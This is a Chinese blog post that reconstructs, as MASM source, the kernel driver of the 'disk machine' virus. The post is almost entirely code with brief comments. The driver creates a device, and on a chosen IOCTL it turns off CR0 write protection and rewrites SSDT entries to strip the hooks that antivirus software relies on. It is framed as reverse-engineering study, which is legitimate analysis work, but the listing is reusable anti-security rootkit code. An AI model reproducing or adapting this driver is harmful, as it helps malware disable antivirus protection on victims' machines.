磁盘机病毒驱动部分逆向分析

最新推荐文章于 2021-01-04 15:04:56 发布

herx1

最新推荐文章于 2021-01-04 15:04:56 发布

阅读量784

点赞数

文章标签：磁盘 string object windows dos 杀毒软件

本文链接：https://blog.csdn.net/herx1/article/details/2793392

版权

;对磁盘机病毒驱动部分进行逆向分析，这是简单的逆向代码，可以了解磁盘机驱动部分的原理。
  .386
  .model flat, stdcall
  option casemap:none

;+++++++++++++++++++++++++++++++++++++++++++++++++++++
; include文件定义
;+++++++++++++++++++++++++++++++++++++++++++++++++++++

include  ntstatus.inc
include  ntddk.inc
include  hal.inc
includelib hal.lib
include  ntoskrnl.inc
includelib ntoskrnl.lib
include  w2kundoc.inc
include  winioctl.inc

unicode  macro page,string,zero
  irpc c,<string>
  db '&c', page
  endm
  ifnb <zero>
  dw zero
  endif
endm

UNICODE_STRING struc ; (sizeof=0x8, standard type)
Length dw ?
MaximumLength dw ?
Buffer dd ? ; offset
UNICODE_STRING ends

.data

dword_10360 dd 0FFFFFFFFh  ; DATA XREF: .text:000103E8o
  dd offset loc_10487
  dd offset loc_10495
  dd 53445352h, 5632D867h, 45D1F0DEh, 0A70FE48Fh, 9D70EB8Eh, 21h
s_EDdkDdd2Drive db 'E:/DDK/ddd2/Driver/objfre/i386/ddd2.pdb',0
s_Dispatchcreat db 'DisPatchCreate!',0 ;
szunhook db '开始恢复SSDT',0
s_Deletesymboli db 'DeleteSymbolicLink Fail!',0 ;
; ---------------------------------------------------------------------------
  align 4
SourceString:
  unicode 0, </ABCTEST>,0
  align 10h
s_DeviceNetapi0:
  unicode 0, </Device/NetApi000>,0

Format db 'IoCreateDevice Fail!',0 ;

s_??Netapi000do:
  unicode 0, </??/NetApi000DOS>,0
  align 10h

s_Iocreatesymbo db 'IoCreateSymbolicLink fail!',0 ;

word_10780 dw 0   ;

word_10782 dw 0
lpMEM  dd 0
  db    0
  db    0
  db    0
  db    0
word_1078C dw 0

; UNICODE_STRING DestinationString
DestinationString UNICODE_STRING <0>
; PDEVICE_OBJECT DeviceObject
DeviceObject dd 0
; UNICODE_STRING UNsymbolicName
UNsymbolicName UNICODE_STRING <0>

.code

DispatchCreate proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
  push offset s_Dispatchcreat ; "DisPatchCreate!"
  call DbgPrint
  mov eax,pIrp
  assume eax : ptr _IRP
  mov [eax].IoStatus.Status, STATUS_SUCCESS
  mov [eax].IoStatus.Information, 0
  assume eax :nothing

  invoke IoCompleteRequest,pIrp,IO_NO_INCREMENT
  mov eax, STATUS_SUCCESS
  ret
DispatchCreate endp
; ---------------------------------------------------------------------------

DispatchDeviceControl proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
  push 18h
  push offset dword_10360
  call ExceptionHanlder

  mov ebx, 0C0000010h
  mov edi, [ebp+0Ch]
  mov eax, [edi+60h]
  mov ecx, [eax+0Ch]

loc_10400:    ; CODE XREF: .text:000103DFj
  mov edx, [eax+10h]
  mov [ebp-1Ch], edx
  mov esi, [edi+3Ch]
  mov eax, [eax+4]
  mov [ebp-20h], eax
  cmp ecx, 22E14Bh
  jnz exit

  and dword ptr [ebp-4], 0
  push 4
  pop ebx
  push ebx
  push ebx
  push edx
  call ds:ProbeForRead
  push ebx
  push ebx
  push esi
  call ds:ProbeForWrite
  or dword ptr [ebp-4], 0FFFFFFFFh
  mov eax, [ebp-1Ch]
  mov ebx, [eax]
  mov eax, ds:KeServiceDescriptorTable ; 恢复杀毒软件挂钩的SSDT
  cmp [eax+8], ebx
  ja short unhook

mov ebx, 0C000000Dh
jmp short exit

; ---------------------------------------------------------------------------

unhook:     ; CODE XREF: .text:00010445j
  mov eax, [eax]
  mov [ebp-24h], eax
  push dword ptr [esi]
  push ebx
  push offset szunhook
  call DbgPrint

  add esp, 0Ch
  cli
  mov eax, cr0 ; 打开写保护
  and eax, 0FFFEFFFFh
  mov cr0, eax
  mov eax, [esi]
  mov ecx, [ebp-24h]
  mov [ecx+ebx*4], eax
  mov eax, cr0
  or eax, 10000h ; 恢复写保护
  mov cr0, eax
  sti
  xor ebx, ebx
  jmp short exit

; ---------------------------------------------------------------------------

loc_10487:    ; DATA XREF: .text:00010364o
  mov eax, [ebp-14h]
  mov eax, [eax]
  mov eax, [eax]
  mov [ebp-28h], eax
  xor eax, eax
  inc eax
  retn

; ---------------------------------------------------------------------------

loc_10495:    ; DATA XREF: .text:00010368o
  mov esp, [ebp-18h]
  mov ebx, [ebp-28h]
  or dword ptr [ebp-4], 0FFFFFFFFh
  mov edi, [ebp+0Ch]

exit:     ; CODE XREF: .text:00010415j
     ; .text:0001044Cj .text:00010485j
  mov eax, ebx
  neg eax
  sbb eax, eax
  not eax
  and eax, [ebp-20h]
  mov [edi+1Ch], eax
  mov [edi+18h], ebx
  xor dl, dl
  mov ecx, edi
  call ds:IofCompleteRequest
  mov eax, ebx
  call ReSEH

retn 8
DispatchDeviceControl endp
; ---------------------------------------------------------------------------

; ---------------------------------------------------------------------------

DriverUnload proc    ; DATA XREF: DriverEntry+DAo
  push offset UNsymbolicName
  call ds:IoDeleteSymbolicLink
  test eax, eax
  jz short delOK

push offset s_Deletesymboli ; "DeleteSymbolicLink Fail!"
call DbgPrint

pop ecx

delOK:     ; CODE XREF: .text:000104EEj
  mov eax, [esp+4]
  push dword ptr [eax+4]
  call ds:IoDeleteDevice
  retn 4

DriverEntry proc proc pDriverObject:PDRIVER_OBJECT, pRegistryPath:PUNICODE_STRING

;pDriverObject = dword ptr 0Ch
;pRegistryPath = dword ptr 10h

  push ebx
  push esi
  mov esi, [esp+pRegistryPath]
  push edi
  xor eax, eax
  mov ebx, offset word_10780
  mov edi, ebx
  stosd
  stosd
  stosd
  stosd
  mov ax, [esi]
  mov word_10780, ax
  mov ax, [esi]
  add ax, 2
  mov word_10782, ax
  movzx eax, ax
  push 32646464h ; Tag
  xor edi, edi
  push eax  ; NumberOfBytes分配的大小
  inc edi
  push edi  ; PoolType：NonPagedPool
  call ds:ExAllocatePoolWithTag
  test eax, eax
  mov lpMEM, eax
  jnz short is2003

mov eax, 0C000009Ah
jmp loc_106D7

; ---------------------------------------------------------------------------

is2003:     ; CODE XREF: DriverEntry+44j
  push esi  ; SourceString
  push ebx  ; DestinationString
  call ds:RtlCopyUnicodeString
  mov esi, ds:IoIsWdmVersionAvailable
  push 30h  ; MinorVersion Windows Server 2003（30h）
  push edi  ; MajorVersion
  call esi ; IoIsWdmVersionAvailable ; 判断操作系统是否支持WDM
  test al, al
  jz short isXP

mov word_1078C, 130h
jmp short supportWDM

; ---------------------------------------------------------------------------

isXP:     ; CODE XREF: DriverEntry+65j
  push 20h  ; MinorVersionWindows XP（20h）
  push edi  ; MajorVersion
  call esi ; IoIsWdmVersionAvailable
  test al, al
  jz short is2000

mov word_1078C, 120h
jmp short supportWDM

; ---------------------------------------------------------------------------

is2000:     ; CODE XREF: DriverEntry+79j
  push 10h  ; MinorVersionWindows 2000（10h）
  push edi  ; MajorVersion
  call esi ; IoIsWdmVersionAvailable
  test al, al
  jz short isME

mov word_1078C, 110h
jmp short supportWDM

; ---------------------------------------------------------------------------

isME:     ; CODE XREF: DriverEntry+8Dj
  push 5  ; MinorVersion Windows me（05h）
  push edi  ; MajorVersion
  call esi ; IoIsWdmVersionAvailable
  neg al
  sbb eax, eax
  and eax, 5
  add eax, 100h
  mov word_1078C, ax

supportWDM:    ; CODE XREF: DriverEntry+70j
     ; DriverEntry+84j DriverEntry+98j
  mov ebx, [esp+4+pDriverObject]
  push 1Bh
  pop ecx
  mov eax, offset DispatchCreate
  lea edi, [ebx+38h] ; IRP_MJ_CREATE
  rep stosd
  mov edi, ds:RtlInitUnicodeString
  push offset SourceString ; "//ABCTEST"
  mov esi, offset DestinationString
  push esi  ; DestinationString
  mov dword ptr [ebx+70h], offset DispatchDeviceControl ; IRP_MJ_DEVICE_CONTROL
  mov dword ptr [ebx+34h], offset DriverUnload
  call edi ; RtlInitUnicodeString
  push offset s_DeviceNetapi0 ; "//Device//NetApi000"
  push esi  ; DestinationString
  call edi ; RtlInitUnicodeString
  push offset DeviceObject ; DeviceObject
  xor eax, eax
  push eax  ; Exclusive
  push eax  ; DeviceCharacteristics
  push 22h  ; DeviceType
  push esi  ; DeviceName
  push eax  ; DeviceExtensionSize
  push ebx  ; DriverObject
  call ds:IoCreateDevice
  mov ebx, eax
  test ebx, ebx
  jge short loc_106AF

push offset Format ; "IoCreateDevice Fail!"
call DbgPrint

  pop ecx
  mov eax, ebx
  jmp short loc_106D7

; ---------------------------------------------------------------------------

loc_106AF:    ; CODE XREF: DriverEntry+103j
  push offset s_??Netapi000do ; "//??//NetApi000DOS"
  mov ebx, offset UNsymbolicName
  push ebx  ; DestinationString
  call edi ; RtlInitUnicodeString
  push esi  ; DeviceName
  push ebx  ; SymbolicLinkName
  call ds:IoCreateSymbolicLink
  mov esi, eax
  test esi, esi
  jge short loc_106D5

push offset s_Iocreatesymbo ; "IoCreateSymbolicLink fail!"
call DbgPrint

pop ecx

loc_106D5: ; CODE XREF: DriverEntry+12Dj
mov eax, esi

loc_106D7:    ; CODE XREF: DriverEntry+4Bj
     ; DriverEntry+112j
  pop edi
  pop esi
  pop ebx
  retn 8

DriverEntry endp

; ---------------------------------------------------------------------------

ExceptionHanlder proc

  push offset _except_handler3
  mov eax, large fs:0
  push eax
  mov large fs:0, esp
  mov eax, [esp+8+arg_4]
  mov [esp+8+arg_4], ebp
  lea ebp, [esp+8+arg_4]
  sub esp, eax
  push ebx
  push esi
  push edi
  mov eax, [ebp-8]
  mov [ebp-18h], esp
  push eax
  mov eax, [ebp-4]
  mov dword ptr [ebp-4], 0FFFFFFFFh
  mov [ebp-8], eax
  retn

ExceptionHanlder endp

; *************** S U B R O U T I N E ***************************************

ReSEH  proc near  ; CODE XREF: .text:000104BFp
  mov ecx, [ebp-10h]
  mov large fs:0, ecx
  pop ecx
  pop edi
  pop esi
  pop ebx
  leave
  push ecx
  retn

ReSEH endp

end DriverEntry